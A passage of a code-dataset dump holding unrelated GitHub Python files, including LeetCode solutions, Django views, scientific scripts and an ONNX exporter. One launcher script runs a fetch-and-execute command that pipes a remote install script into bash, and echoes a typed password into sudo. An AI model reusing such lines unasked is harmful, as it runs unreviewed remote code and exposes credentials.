(cv2.waitKey(1) & 0xFF == ord('q')):\r\n\t\t\tbreak\r\n\t\tframe = cv2.resize(frame, (normal_width, normal_height))\r\n\t\tprocess_image(frame, svm, templates, templates_title, frame_id, info)\r\n\t\t\r\n\t\tout.write(frame)\r\n\t\tframe_id += 1\r\n \r\n\twith open(output, 'w') as f:\r\n\t\tf.write(str(len(info)) + '\\n')\r\n\t\tfor elem in info:\r\n\t\t f.write(' '.join(str(x) for x in elem))\r\n\t\t \r\n\tinp.release()\r\n\tout.release()\r\n\tcv2.destroyAllWindows()\r\n\r\n\t\r\nif __name__ == '__main__':\r\n\t# extract_video_datasets('D:\\workspace\\TrafficSignRecognitionAndDetection\\Contest\\datasets\\Orginal\\\\abc')\r\n\t# create_train_datasets('D:\\workspace\\TrafficSignRecognitionAndDetection\\Contest\\datasets\\Orginal\\\\abc\\_10')\r\n\t# machine_learning()\r\n\tprocess_video()\r\n\r\n\t'''\r\n\tfor img_dir in glob.glob('D:\\workspace\\\\TrafficSignRecognitionAndDetection\\Contest\\datasets\\Images\\_5\\*'):\r\n\t\tprint(img_dir.split('.')[0] + '111' + '.jpg')\r\n\t\timg = 
cv2.imread(img_dir)\r\n\t\timg = cv2.flip(img, 1)\r\n\t\tcv2.imwrite(img_dir.split('.')[0] + '_flip' + '.jpg', img)\r\n\t'''","repo_name":"duyndh98/DigitalRace_2017-2018_UniversityRound","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"71960394449","text":"\"\"\"\r\n\r\nGivalueen a string s which consists of lowercase or uppercase letters, return the length of the longest palindrome that can be built with those letters.\r\n\r\nLetters are case sensitivaluee, for example, \"Aa\" is not considered a palindrome here.\r\n\r\nExample 1:\r\n\r\nInput: s = \"abccccdd\"\r\nOutput: 7\r\nExplanation: One longest palindrome that can be built is \"dccaccd\", whose length is 7.\r\nExample 2:\r\n\r\nInput: s = \"a\"\r\nOutput: 1\r\nExplanation: The longest palindrome that can be built is \"a\", whose length is 1.\r\n\r\n\"\"\"\r\n\r\nfrom collections import Counter\r\n\r\n\r\ndef longest_palindrome(s):\r\n c = Counter(s)\r\n res = 0\r\n k = 0\r\n for i, j in c.items():\r\n print(i, j)\r\n if j % 2 == 0:\r\n res += j\r\n else:\r\n res += j - 1\r\n k += 1\r\n if k >= 1:\r\n res += 1\r\n return res\r\n\r\n\r\nlongest_palindrome(\"dccaccd\")\r\n","repo_name":"BlueBoi904/Pycyharm","sub_path":"files/longest_palindrome.py","file_name":"longest_palindrome.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16497056143","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom customers.models import Customer\nfrom services.models import Service\nfrom staff.models import StaffModel\nfrom scheduling.models import Appointment\n\n# Create your views here.\ndef unauthorized_view(request):\n return render(request, 'unauthorized.html')\n\ndef login_required_view(request):\n return render(request, 'login_required.html')\n\n@login_required\ndef home_view(request):\n if hasattr(request.user, 'staff'):\n appointments = Appointment.objects.filter(staff__user=request.user)\n services=Service.objects.all()\n staffs=StaffModel.objects.all()\n elif hasattr(request.user, 'user'):\n appointments = Appointment.objects.filter(customer__user=request.user)\n services=Service.objects.filter(is_working=True)\n staffs=StaffModel.objects.filter(is_active=True)\n else:\n appointments=Appointment.objects.all()\n services=Service.objects.all()\n staffs=StaffModel.objects.all()\n appointments_today = appointments.order_by('appdatetime')\n context = {\n 'todays': appointments_today,\n \"services\": services,\n \"staffs\": staffs,\n }\n return render(request, 'overview.html', context)\n","repo_name":"mikaelaatan/msys42-salonmgtsystem","sub_path":"app/common/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29763019791","text":"import json\r\nimport csv\r\n\r\ndata = []\r\nwith open(\"test-data.json\", \"r\") as fp:\r\n temp = fp.read()\r\n data = json.loads(temp)\r\n\r\n# temp[service[\"table_name\"]] = [i for n, i in enumerate(\r\n # temp[service[\"table_name\"]]) if i not in\r\n # temp[service[\"table_name\"]][:n]]\r\n\r\nduplicates = [i for n, i in enumerate(data) if i in data[:n]]\r\nunique = [i for n, i in enumerate(data) if i not in data[:n]]\r\n# print(temp)\r\nwith 
open(\"actual-data-2.csv\",\"w+\") as my_csv:\r\n csvWriter = csv.writer(my_csv,delimiter=',')\r\n csvWriter.writerows(data)\r\n\r\nwith open(\"duplicate-2.csv\",\"w+\") as my_csv:\r\n csvWriter = csv.writer(my_csv,delimiter=',')\r\n csvWriter.writerows(duplicates)\r\n\r\nwith open(\"unique-2.csv\",\"w+\") as my_csv:\r\n csvWriter = csv.writer(my_csv,delimiter=',')\r\n csvWriter.writerows(unique)","repo_name":"crypto-44/FindDuplicatesInArrayOfValues","sub_path":"lambda_handler.py","file_name":"lambda_handler.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39658515660","text":"import unittest\nfrom typing import List\nfrom pprint import pprint\n\n\nclass Solution:\n def fractionToDecimal(self, numerator: int, denominator: int) -> str:\n res, cache = [], {}\n i = 0\n sign = \"-\" if numerator * denominator < 0 else \"\"\n numerator, denominator = abs(numerator), abs(denominator)\n\n int_part, remainder = divmod(numerator, denominator)\n while remainder > 0:\n numerator = remainder*10\n if numerator in cache:\n s, e = cache[numerator], i\n not_repeating = str(int_part) + \".\" + \"\".join(res[:s])\n repeating = \"(\" + \"\".join(res[s:e]) + \")\"\n return sign+not_repeating+repeating\n\n quotient, remainder = divmod(numerator, denominator)\n res.append(str(quotient))\n cache[numerator] = i\n i += 1\n else:\n return sign+str(int_part) + ((\".\" + \"\".join(res)) if res else \"\")\n\n\nclass TestSolution(unittest.TestCase):\n\n def test_case_1(self):\n sol = Solution()\n numerator = 1\n denominator = 2\n expected = \"0.5\"\n self.assertEqual(sol.fractionToDecimal(\n numerator, denominator), expected)\n\n def test_case_2(self):\n sol = Solution()\n numerator = 2\n denominator = 1\n expected = \"2\"\n self.assertEqual(sol.fractionToDecimal(\n numerator, denominator), expected)\n\n def test_case_3(self):\n sol = Solution()\n numerator = 2\n denominator = 3\n expected = \"0.(6)\"\n self.assertEqual(sol.fractionToDecimal(\n numerator, denominator), expected)\n\n def test_case_4(self):\n sol = Solution()\n numerator = 4\n denominator = 333\n expected = \"0.(012)\"\n self.assertEqual(sol.fractionToDecimal(\n numerator, denominator), expected)\n\n def test_case_5(self):\n sol = Solution()\n numerator = 1\n denominator = 5\n expected = \"0.2\"\n self.assertEqual(sol.fractionToDecimal(\n numerator, denominator), expected)\n\n # def test_edge_case_1(self):\n # sol = Solution()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"EdisonChendi/leetcodeshuashuashua","sub_path":"meiriyiti/cn/166_fraction_to_recurring_decimal.py","file_name":"166_fraction_to_recurring_decimal.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73835964370","text":"class Disturbance:\n \"\"\"Class for represanting disturbances\"\"\"\n\n def __init__(self, variable: str | None, amplitude_value: float) -> None:\n if amplitude_value > 0:\n self.isPositive: bool = True\n self.amplitude: float | None = amplitude_value\n elif amplitude_value < 0:\n self.amplitude = amplitude_value\n self.isPositive = False\n elif amplitude_value == 0:\n self.amplitude = None\n self.isPositive = False\n\n if variable == \"u\":\n self.axis: int | None = 1\n self.type: str | None = \"Derivative\" # Translational Only get Derivative\n self.isRotational: bool = False\n elif variable == \"w\":\n self.axis = 3\n self.type = 
\"Derivative\" # Translational Only get Derivative\n self.isRotational = False\n elif variable == \"q\":\n self.axis = 2\n self.type = \"Derivative\" # Translational Only get Derivative\n self.isRotational = True\n elif variable == \"theta\":\n self.axis = 2\n self.type = \"Value\" # Rotational\n self.isRotational = True\n\n elif variable == \"v\":\n self.axis = 2\n self.type = \"Derivative\" # Translational Only get Derivative\n self.isRotational = False\n elif variable == \"p\":\n self.axis = 1\n self.type = \"Derivative\" # Translational Only get Derivative\n self.isRotational = True\n elif variable == \"r\":\n self.axis = 3\n self.type = \"Derivative\" # Rotational Only get Derivative\n self.isRotational = True\n elif variable == \"phi\":\n self.axis = 1\n self.type = \"Value\" # Rotational\n self.isRotational = True\n elif variable is None:\n self.axis = None\n self.type = None\n self.amplitude = None\n self.name: str = \"Trim\"\n self.var: str = \"Trim\"\n else:\n raise ValueError(\"Invalid disturbance variable\")\n if variable is not None:\n self.name = f\"{variable} disturbance\"\n self.var = variable\n\n def __str__(self) -> str:\n return f\"{self.name}:\\tType:\\t{self.type} and \\tAmplitude:\\t{self.amplitude}.\"\n","repo_name":"trifwn/Icarus","sub_path":"ICARUS/Flight_Dynamics/disturbances.py","file_name":"disturbances.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"38591575580","text":"def merge(lista1, lista2):\n # Nueva lista para guardar elementos\n nueva = list() \n # Vamos extraer los primeros elementos de cada lista y compararlos mientras se pueda\n while len(lista1) > 0 and len(lista2) > 0:\n # Si el primer elemento de la primera lista es menor o igual que el de la segunda\n if lista1[0] <= lista2[0]:\n # Lo agregamos a nuesta nueva lista\n nueva.append(lista1[0]) \n # Removemos el primer elemento de la primera lista\n lista1 = lista1[1:]\n else: # Si el primer elemento de la segunda lista es menor\n # Se agrega a la nueva lista\n nueva.append(lista2[0]) \n # Removemos el primer elemento de la segunda lista\n lista2 = lista2[1:]\n # Notar que en algun momento una de las dos listas quedara vacia antes que la otra\n # Con los ciclos que siguen vamos a agregar los elementos sobrantes a nuesta nueva lista\n # Solo uno de los siguientes dos ciclos se ejecutara\n for v1 in lista1:\n nueva.append(v1)\n for v2 in lista2:\n nueva.append(v2)\n return nueva\n# Prueba\nl1 = [1, 1, 2, 3, 5, 6, 10, 12]\nl2 = [0, 2, 5, 5, 7, 8]\nprint(merge(l1, l2))","repo_name":"progra-utfsm/ejercicios","sub_path":"docs/python/listas/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9117939530","text":"import argparse\nimport ase.io\nfrom ase.neb import NEB\nimport os\n\n\ndef get_atoms(file, index):\n if \".traj\" in file:\n atoms = ase.io.read(filename=file, index=index, format=\"traj\")\n elif \".xyz\" in file:\n atoms = ase.io.read(filename=file, index=index, format=\"xyz\")\n elif \".xml\" in file:\n atoms = ase.io.read(filename=file, index=index, format=\"vasp-xml\")\n else:\n raise f\"Check the format of the file, {file} to read.\"\n return atoms\n\n\ndef read_command_line_arguments():\n parser = argparse.ArgumentParser(\n description=\"Interpolates between IS to TS and TS to FS\")\n parser.add_argument(\"--IS\", type=str, required=True,\n help=\"path of 
initial state structure\", metavar=\"\")\n parser.add_argument(\"--TS\", type=str, required=True,\n help=\"path of guess transition state structure\", metavar=\"\")\n parser.add_argument(\"--FS\", type=str, required=True,\n help=\"path of final state structure\", metavar=\"\")\n parser.add_argument(\"--out_dir\", type=str, default=\".\",\n help=\"output directory (default is \\\".\\\" i.e. current working directory)\", metavar=\"\")\n parser.add_argument(\"--IS_index\", type=int, default=-1,\n help=\"index of IS structure (default is last index)\", metavar=\"\")\n parser.add_argument(\"--TS_index\", type=int, default=-1,\n help=\"index of TS structure (default is last index)\", metavar=\"\")\n parser.add_argument(\"--FS_index\", type=int, default=-1,\n help=\"index of FS structure (default is last index)\", metavar=\"\")\n parser.add_argument(\"--method\", type=str, default=\"linear\", choices=[\n \"linear\", \"idpp\"], help=\"NEB interpolation method (default is linear)\", metavar=\"\")\n parser.add_argument(\"--left\", type=int, default=2,\n help=\"number of images to interpolate between IS and TS (default is 2)\", metavar=\"\")\n parser.add_argument(\"--right\", type=int, default=2,\n help=\"number of images to interpolate between TS and FS (default is 2)\", metavar=\"\")\n args = parser.parse_args()\n\n if args.out_dir[-1] == \"/\":\n args.out_dir = args.out_dir[:-1]\n\n return args\n\n\nif __name__ == '__main__':\n args = read_command_line_arguments()\n\n initial_structure = get_atoms(file=args.IS, index=args.IS_index)\n initial_structure.pbc = True\n transition_structure = get_atoms(file=args.TS, index=args.TS_index)\n transition_structure.pbc = True\n final_structure = get_atoms(file=args.FS, index=args.FS_index)\n final_structure.pbc = True\n\n guess_path = []\n images = [initial_structure]\n images += [initial_structure.copy() for _ in range(args.left)]\n images += [transition_structure]\n neb = NEB(images)\n neb.interpolate(method=args.method, mic=True)\n guess_path = images[1:] # this includes the guess TS but excludes IS\n del images\n\n images = [transition_structure]\n images += [transition_structure.copy() for i in range(args.right)]\n images += [final_structure]\n neb = NEB(images)\n neb.interpolate(method=args.method, mic=True)\n guess_path += images[1:-1] # this excludes both the guess TS and FS\n del images\n\n if not os.path.exists(f\"{args.out_dir}\") and args.out_dir != \".\":\n os.makedirs(f\"{args.out_dir}\")\n ase.io.write(f\"{args.out_dir}/is.traj\", initial_structure)\n ase.io.write(f\"{args.out_dir}/fs.traj\", final_structure)\n ase.io.write(f\"{args.out_dir}/guess_path.traj\", guess_path)\n","repo_name":"skethirajan/MOF_CODES","sub_path":"mof_codes/dft/VASP/neb_interpolate.py","file_name":"neb_interpolate.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16368998789","text":"import platform\nimport os\nimport sys\nfrom shutil import which\nfrom subprocess import call\nimport Core.LinuxStartUp as Start\n\n\nif sys.version_info[:2] < (3, 7):\n print(\"Requires Python 3.7 or newer. 
\"\n \"Python %d.%d detected\" % sys.version_info[:2])\n sys.exit(-1)\n\nif platform.system() == 'Windows':\n OS = 'Windows'\nelif platform.system() == 'Linux':\n OS = 'Linux'\nelif platform.system() == 'Darwin':\n OS = 'Darwin'\n\npath = os.getcwd()\nif OS == 'Windows':\n cache = path + '\\Core\\Cache'\nelif OS == 'Darwin':\n cache = path + '/Core/Cache'\nelse: # Linux\n cache = path + '/Core/Cache'\n\nisExist = os.path.exists(cache)\nif not isExist: # Create a new directory because it does not exist\n os.system('pip install -r requirements.txt')\n os.system('pip install latex')\n if OS == 'Windows':\n if which('latex'):\n print('latex installed')\n else:\n print('Please install Latex before using the software')\n sys.exit(-1)\n elif OS == 'Darwin':\n if which('latex'):\n print('latex installed')\n else:\n os.system(\n '/bin / bash - c \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\"')\n os.system('brew install mactex')\n else: # Linux\n pwd = Start.Linux()\n cmd = 'sudo apt install -y idle3 texlive-latex-extra cm-super dvipng'\n return_call = call('echo {} | sudo -S {}'.format(pwd, cmd), shell=True)\n while return_call == 1:\n pwd = Start.Linux()\n cmd = 'sudo apt install -y idle3 texlive-latex-extra cm-super dvipng'\n return_call = call('echo {} | sudo -S {}'.format(pwd, cmd), shell=True)\n os.makedirs(cache)\n\n\nif OS == 'Windows':\n import Core.GUI\nelif OS == 'Darwin':\n import Core.GUI\nelse: # Linux\n import Core.GUI\n","repo_name":"CharlieGPA40/SHG-Simulation-Package-Beta","sub_path":"StartGui.py","file_name":"StartGui.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73351922778","text":"from plone import api\nfrom plone.dexterity.interfaces import IDexterityFTI\nfrom zope.component import getAllUtilitiesRegisteredFor\n\nimport logging\nimport transaction\n\n\nlogger = logging.getLogger(__name__)\nPACKAGE_NAME = \"collective.behavior.relatedmedia\"\n\n\ndef package_rename(context):\n profile_id = \"profile-{0}:default\".format(PACKAGE_NAME)\n oldreg_profile_id = \"profile-{0}:package_rename\".format(PACKAGE_NAME)\n # remove old registry entries\n context.runAllImportStepsFromProfile(oldreg_profile_id)\n # add new registry\n context.runImportStepFromProfile(profile_id, \"plone.app.registry\")\n\n\ndef local_gallery_configuration(context):\n update_profile_id = \"profile-{0}:local_config\".format(PACKAGE_NAME)\n context.runAllImportStepsFromProfile(update_profile_id)\n\n\ndef registry_cleanup(context):\n update_profile_id = \"profile-{0}:registry_cleanup\".format(PACKAGE_NAME)\n context.runAllImportStepsFromProfile(update_profile_id)\n\n\ndef migrate_base_path_relations(context):\n from collective.behavior.relatedmedia.behavior import IRelatedMediaBehavior\n\n catalog = api.portal.get_tool(\"portal_catalog\")\n items = catalog(\n object_provides=\"collective.behavior.relatedmedia.behavior.IRelatedMedia\",\n )\n _num_items = len(items)\n\n for idx, item in enumerate(items, 1):\n try:\n obj = item.getObject()\n except KeyError as msg:\n # there might be broken objects\n logger.warning(f\"Could not migrate {item.getPath()}: {msg}\")\n continue\n\n try:\n base_path = IRelatedMediaBehavior(obj).related_media_base_path\n except TypeError:\n logger.info(\n f\"{idx}/{_num_items} no relatedmedia behavior registered for {item.getPath()}.\"\n )\n continue\n\n if not base_path:\n logger.info(\n f\"{idx}/{_num_items} skip migration of {item.getPath()} -> 
no base path defined.\"\n            )\n            continue\n\n        logger.info(f\"{idx}/{_num_items} migrating {item.getPath()}.\")\n\n        for media in catalog(path=base_path.to_path):\n            # related images\n            if media.portal_type == \"Image\":\n                img_obj = media.getObject()\n                api.relation.create(\n                    source=obj, target=img_obj, relationship=\"related_images\"\n                )\n                logger.info(f\" - related_image {media.getPath()} created\")\n                continue\n            # related attachments\n            if media.portal_type == \"File\":\n                file_obj = media.getObject()\n                api.relation.create(\n                    source=obj, target=file_obj, relationship=\"related_attachments\"\n                )\n                logger.info(f\" - related_attachment {media.getPath()} created\")\n                continue\n            logger.info(f\" - no relation created for unknown type {media.getPath()}...\")\n\n        # remove base_path information\n        IRelatedMediaBehavior(obj).related_media_base_path = None\n        transaction.commit()\n\n\ndef migrate_behavior_name(context):\n    ftis = getAllUtilitiesRegisteredFor(IDexterityFTI)\n\n    for fti in ftis:\n        updated_fti = []\n        for behavior in fti.behaviors:\n            if behavior in updated_fti:\n                continue\n            if behavior == \"collective.behavior.relatedmedia.behavior.IRelatedMedia\":\n                updated_fti.append(\"collective.relatedmedia\")\n            else:\n                updated_fti.append(behavior)\n        fti.behaviors = tuple(updated_fti)\n","repo_name":"collective/collective.behavior.relatedmedia","sub_path":"collective/behavior/relatedmedia/upgrades.py","file_name":"upgrades.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"11564319853","text":"from js9 import j\nimport blist\nfrom blist import *  # https://github.com/DanielStutzbach/blist\nfrom test_pb2 import *\nfrom google.protobuf import json_format\nfrom google.protobuf import text_format\n\n\nclass Person2():\n    def __init__(self, nr):\n        self.nr = nr\n\n    @property\n    def obj(self):\n        m = Person()\n        m.ParseFromString(out[self.nr])\n        return m\n\n\nstartmb = j.application.getMemoryUsage() / 1024\nprint(\"start:%s MB\" % startmb)\nprint(\"start\")\ntot = 20000\ndata = \"a\" * 100\nout = blist()\nout2 = blist()\npersons = []\nfor i in range(tot):\n    m = Person()\n    m.name = data\n    m.phones.add(number=\"23424324\", type=Person.MOBILE)\n    m.SerializeToString()\n    out.append(m.SerializeToString())\n    out2.append(\"this is a name;urgent;something\")\n    # persons.append(Person2(i))\nprint(\"read\")\nfor item in out:\n    m = Person.FromString(item)\n    json_format.MessageToDict(m)\n    # text_format.MessageToString(m)\nprint(\"stop\")\n\n\nprint(\"minsize:%s MB\" % ((tot * (len(data) + 30)) / 1024 / 1024))\n\nstopmb = j.application.getMemoryUsage() / 1024\nprint(\"dataused:%s MB\" % (stopmb - startmb))\n\n# res = []\n\n# startmb = j.application.getMemoryUsage() / 1024\n# print(\"start:%s MB\" % startmb)\n# print(\"start\")\n# tot = 100000\n# data = \"a\" * 100\n# for i in range(tot):\n#     m = test.SearchRequest()\n#     m.query = data\n#     res.append(m)\n# print(\"stop\")\n\n# print(\"minsize:%s MB\" % (tot * len(data) / 1024 / 1024))\n\n# stopmb = j.application.getMemoryUsage() / 1024\n# print(\"dataused:%s MB\" % (stopmb - startmb))\n","repo_name":"Incubaid/playenv","sub_path":"protobuf/proto.py","file_name":"proto.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73297752215","text":"import numpy as np\n\ndef debug(debuglevel, msg, DEBUG=1, **kwargs):\n    if debuglevel <= DEBUG:\n        if 'printNow' in kwargs:\n            if 
kwargs['printNow']:\n print(msg) \n else:\n print(msg) \n\ndef env_update(env, RL, data, episodes=50, sim_speed = 0.05, showRender=True, renderEveryNth=5, printEveryNth=1):\n global_reward = np.zeros(episodes)\n data['global_reward']=global_reward\n\n for episode in range(episodes): \n t=0\n # initial state\n if episode == 0:\n state = env.reset(value = 0)\n else:\n state = env.reset()\n \n debug(2,'state(ep:{},t:{})={}'.format(episode, t, state))\n\n # RL choose action based on state\n action = RL.choose_action(str(state))\n while True:\n # fresh env\n #if(t<5000 and (showRender or (episode % renderEveryNth)==0)):\n if(showRender or (episode % renderEveryNth)==0):\n env.render(sim_speed)\n\n\n # RL take action and get next state and reward\n state_, reward, done = env.step(action)\n global_reward[episode] += reward\n debug(2,'state(ep:{},t:{})={}'.format(episode, t, state))\n debug(2,'reward_{}= total return_t ={} Mean50={}'.format(reward, global_reward[episode],np.mean(global_reward[-50:])))\n \n\n # RL learn from this transition\n # and determine next state and action\n state, action = RL.learn(str(state), action, reward, str(state_))\n\n\n # break while loop when end of this episode\n if done:\n break\n else:\n t=t+1\n\n debug(1,\"({}) Episode {}: Length={} Total return = {} \".format(RL.display_name,episode, t, global_reward[episode],global_reward[episode]),printNow=(episode%printEveryNth==0))\n if(episode>=100):\n debug(1,\" Median100={} Variance100={}\".format(np.median(global_reward[episode-100:episode]),np.var(global_reward[episode-100:episode])),printNow=(episode%printEveryNth==0))\n # end of game\n print('game over -- Algorithm {} completed'.format(RL.display_name))\n env.destroy()","repo_name":"wiesnseb/sailing_rf","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34805379085","text":"\"\"\"Urls for User and UserProfile views\"\"\"\nfrom django.urls import path\nfrom django.contrib.auth import views as auth_views\n\nfrom . 
import views\n\napp_name = \"accounts\"\n\n\nurlpatterns = [\n    # login and registration endpoints\n    path(\"register\", views.RegisterView.as_view(), name=\"register\"),\n    path(\n        \"login/\",\n        auth_views.LoginView.as_view(\n            template_name=\"registration/login.html\", redirect_authenticated_user=True\n        ),\n        name=\"login\",\n    ),\n    path(\n        \"logout/\",\n        auth_views.LogoutView.as_view(template_name=\"registration/logout.html\"),\n        name=\"logout\",\n    ),\n    # detail view\n    path(\n        \"profile/<int:pk>/\", views.UserProfileView.as_view(), name=\"profile-detail\"\n    ),\n]\n","repo_name":"adam-harmasz/gomoku_v_0_2","sub_path":"src/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"8483530101","text":"\nfrom os import PathLike\nfrom pathlib import Path\n\nfrom transformers import HubertConfig, HubertForCTC\n\nimport torch\nimport torch.onnx\n\nfrom ..converters.convert_hubert import (\n    extract_hubert_config,\n    extract_hubert_state,\n    load_fairseq_hubert,\n)\nfrom ..converters.convert_vits import (\n    extract_vits_config,\n    extract_vits_state,\n    load_vits_checkpoint,\n)\nfrom ..models.configuration_rvc import RVCConfig\nfrom ..models.feature_extraction_rvc import RVCFeatureExtractor\nfrom ..models.modeling_rvc import RVCModel\nfrom ..models.vits.models import (\n    SynthesizerTrnMs256NSFsid,\n    SynthesizerTrnMs256NSFsidConfig,\n)\n\ndef export_onnx(\n    vits_path: str | PathLike,\n    output_path: str | PathLike = \"./models/out.onnx\",\n    save_directory: str | PathLike | None = None,\n    hubert_path: str | PathLike = \"./models/hubert_base\",\n    f0_method: str = \"pm\",\n    unsafe: bool = False,\n    safe_serialization=True,\n):\n    \"\"\"Export onnx.\n\n    Args:\n        vits_path: Path to the original VITS checkpoint.\n        save_directory: Directory to save the converted RVC model (optional).\n        hubert_path: Path to the original Hubert model (default: \"./models/hubert_base\").\n        f0_method: F0 extraction method, \"pm\" or \"harvest\" (default: \"pm\").\n        unsafe: Set to True to load untrusted models (default: False).\n        safe_serialization: Set to False to disable safe serialization (default: True).\n    \"\"\"\n\n    if save_directory is None:\n        p = Path(vits_path)\n        save_directory = p.parent / p.stem\n\n    if Path(hubert_path).is_file():\n        fairseq_hubert = load_fairseq_hubert(str(hubert_path), unsafe)\n        hubert_config = extract_hubert_config(fairseq_hubert)\n        hubert_state = extract_hubert_state(hubert_config, fairseq_hubert)\n    else:\n        hubert_config = HubertConfig.from_pretrained(hubert_path)\n        hubert_model = HubertForCTC.from_pretrained(hubert_path)\n        assert isinstance(hubert_model, HubertForCTC)\n        hubert_state = hubert_model.state_dict()\n\n    assert isinstance(hubert_config, HubertConfig)\n\n    if Path(vits_path).is_file():\n        vits_checkpoint = load_vits_checkpoint(vits_path)\n        vits_config = extract_vits_config(vits_checkpoint)\n        vits_state = extract_vits_state(vits_checkpoint)\n        vits_strict = False\n    else:\n        vits_config = SynthesizerTrnMs256NSFsidConfig.from_pretrained(vits_path)\n        assert isinstance(vits_config, SynthesizerTrnMs256NSFsidConfig)\n        vits = SynthesizerTrnMs256NSFsid.from_pretrained(vits_path)\n        assert isinstance(vits, SynthesizerTrnMs256NSFsid)\n        vits_state = vits.state_dict()\n        vits_strict = True\n\n    model = RVCModel(\n        RVCConfig(\n            hubert=hubert_config,\n            vits=vits_config,\n        )\n    )\n\n    # load state\n    model.hubert.load_state_dict(hubert_state)\n    model.vits.load_state_dict(vits_state, 
strict=vits_strict)\n\n model.eval()\n model.to(\"cpu\")\n\n dummy_input_values = torch.randn(1, 16000, dtype=torch.float32)\n dummy_f0_coarse = torch.zeros(1, 100, dtype=torch.int32)\n dummy_f0 = torch.randn(1, 100, dtype=torch.float32)\n\n # export\n torch.onnx.export(\n model,\n (dummy_input_values, dummy_f0_coarse, dummy_f0),\n output_path,\n opset_version=15,\n input_names=[\"input_values\", \"f0_coarse\", \"f0\"],\n output_names=[\"output\"],\n dynamic_axes={\n \"input_values\": {0: \"batch\", 1: \"sequence\"},\n \"f0_coarse\": {0: \"batch\", 1: \"sequence\"},\n \"f0\": {0: \"batch\", 1: \"sequence\"},\n \"output\": {0: \"batch\", 1: \"sequence\"},\n },\n )\n\n return model\n\n\nif __name__ == \"__main__\":\n from argh import ArghParser\n\n parser = ArghParser()\n parser.set_default_command(export_onnx)\n parser.dispatch()\n","repo_name":"ogukei/simple-rvc","sub_path":"hf-rvc/hf_rvc/tools/export_onnx.py","file_name":"export_onnx.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"2338970285","text":"import csv\nimport logging\n\nfrom datetime import datetime\n\nlog = logging.getLogger(\"wifininja.fileLib\")\n\nWLC_HEADINGS = [\n \"date\", \"time\", \"clients-now\", \"lan-interface\",\n \"in-bytes\", \"out-bytes\", \"in-discards\", \"in-discards-64\",\n \"in-unknown-protos\", \"in-unknown-protos-64\", \"out-discards\", \"per-phy\", \"top-os\"\n]\n\nAP_HEADINGS = [\n \"date\", \"time\", \"ap-name\", \"radio-mac\", \"eth-mac\",\n \"slot\", \"state\", \"mode\", \"band\", \"channel\", \"width\", \"stations\", \"ch_util\", \"ch_changes\",\n \"slot\", \"state\", \"mode\", \"band\", \"channel\", \"width\", \"stations\", \"ch_util\", \"ch_changes\",\n \"slot\", \"state\", \"mode\", \"band\", \"channel\", \"width\", \"stations\", \"ch_util\", \"ch_changes\",\n \"slot\", \"state\", \"mode\", \"band\", \"channel\", \"width\", \"stations\", \"ch_util\", \"ch_changes\",\n \"slot\", \"state\", \"mode\", \"band\", \"channel\", \"width\", \"stations\", \"ch_util\", \"ch_changes\"\n]\n\n\nclass InitCsv():\n\n def __init__(self):\n\n self.path = \"./logs/\"\n self.stamp = str(datetime.now())[:-7].replace(':', \"-\").replace(\" \", \"_\")\n self.wlc_filename = f\"{self.path}{self.stamp}_WLC.csv\"\n self.ap_filename = f\"{self.path}{self.stamp}_AP.csv\"\n\n write_csv(self.wlc_filename, WLC_HEADINGS)\n write_csv(self.ap_filename, AP_HEADINGS)\n\n\ndef date_time():\n\n dt = []\n stamp = str(datetime.now())[:-7]\n dt.append(stamp.split()[0])\n dt.append(stamp.split()[1])\n\n return dt\n\n\ndef write_csv(filename, row):\n\n try:\n with open(filename, \"a\") as csvfile:\n csvwriter = csv.writer(csvfile, lineterminator=\"\\n\", delimiter=\",\")\n csvwriter.writerow(row)\n except PermissionError:\n log.error(f\"Unable to append CSV\")\n\n\ndef send_to_csv_wlc(wlc_dict):\n\n row_data = date_time()\n try:\n row_data.append(wlc_dict[\"all-clients\"])\n row_data.append(wlc_dict[\"lan-interface\"])\n row_data.append(wlc_dict[\"in-bytes\"])\n row_data.append(wlc_dict[\"out-bytes\"])\n row_data.append(wlc_dict[\"in-discards\"])\n row_data.append(wlc_dict[\"in-discards-64\"])\n row_data.append(wlc_dict[\"in-unknown-protos\"])\n row_data.append(wlc_dict[\"in-unknown-protos-64\"])\n row_data.append(wlc_dict[\"out-discards\"])\n try:\n 